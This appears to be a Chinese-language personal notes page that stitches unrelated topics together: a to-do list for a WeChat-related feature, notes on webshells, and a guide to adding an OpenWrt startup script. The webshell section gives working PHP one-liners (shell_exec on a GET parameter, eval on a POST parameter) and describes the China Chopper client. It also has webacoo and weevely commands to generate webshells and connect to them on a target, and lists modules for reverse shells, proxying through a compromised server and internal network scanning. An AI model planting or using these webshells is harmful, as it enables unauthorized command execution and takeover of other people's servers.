1、微信样式和判断

2、微信朋友圈会在地址后面添加链接，是个难题，需要处理

3、添加内容打包下载功能，是否有必要添加定时自动打包功能再说~

4、文章编辑内容的标签功能还需要想办法处理，bb的标签选项功能不适用

php经典一句话: <?php echo shell_exec($_GET['cmd']);?>

中国菜刀：
官网：www.maicaidao.co
原理：上传一句话(<?php @eval($_POST['我是密码']);?>)至服务器端，再用中国菜刀客户端(图形化界面)去连接服务器

 

webacoo(kali):
特点：传输的数据包裹在cookie中，并非http包体内，起到一定绕过作用
原理：生成webshell，上传至目标服务器，再拿webacoo去连接该webshell，返回可以执行系统命令的shell
缺点：不可设置专属连接密码
生成webshell： webacoo -g -o a.php
连接webshell： webacoo -t -u http://192.168.1.1/a.php

 

weevely(kali):
原理：生成webshell，上传至目标服务器，再拿weevely去连接该webshell，返回可以执行系统命令的shell
生成webshell：weevely generate 密码 a.php
连接webshell：weevely http://192.168.1.1/a.php 密码
特点：连接到目标服务器webshell后还可以调用内置的N多模块，在shell下输入help查看模块，直接在shell下输入模块名称使用模块

30多个管理模块举例：
1、执行系统命令、浏览文件系统
2、检查服务器常见配置错误
3、创建正向、反向TCP Shell连接
4、将目标服务器作为代理http服务器(肉鸡) ====>只需要在连接到的shell中输入net_proxy即可打开代理，此时会在本地监听127.0.0.1:8080，浏览器设置为该代理后所有流量将走目标服务器
5、从目标计算机运行端口扫描，渗透内网

openwrt添加开机运行脚本
1.进入/etc/init.d/目录创建脚本test

vim test

在/etc/init.d/test中按照以下格式编写shell脚本

#!/bin/sh /etc/rc.common
START=99
STOP=15
start() {
 .......

}

START的值决定这个脚本的启动顺序，这里为99
start()里执行增加的功能脚步或者写脚本启动自己的程序
.给脚本添加可执行权限


chmod +x test
创建一个软链接


/etc/init.d/test enable
文件全路径/etc/init.d/test enable的命令实质上是为脚本文件创建一个软链接，软链接存放于/etc/rc.d/下
这时可以看到


/etc/rc.d/目录下可以看到其它的启动脚本和顺序
这样就完成了。
可以在/etc/init.d/目录看脚本自启动状态

for F in /etc/init.d/* ; do $F enabled && echo $F on || echo $F **disabled**; done

执行完命令就看看到自己脚步自启动是on还是off.

参考：https://www.cnblogs.com/milton/p/6345621.html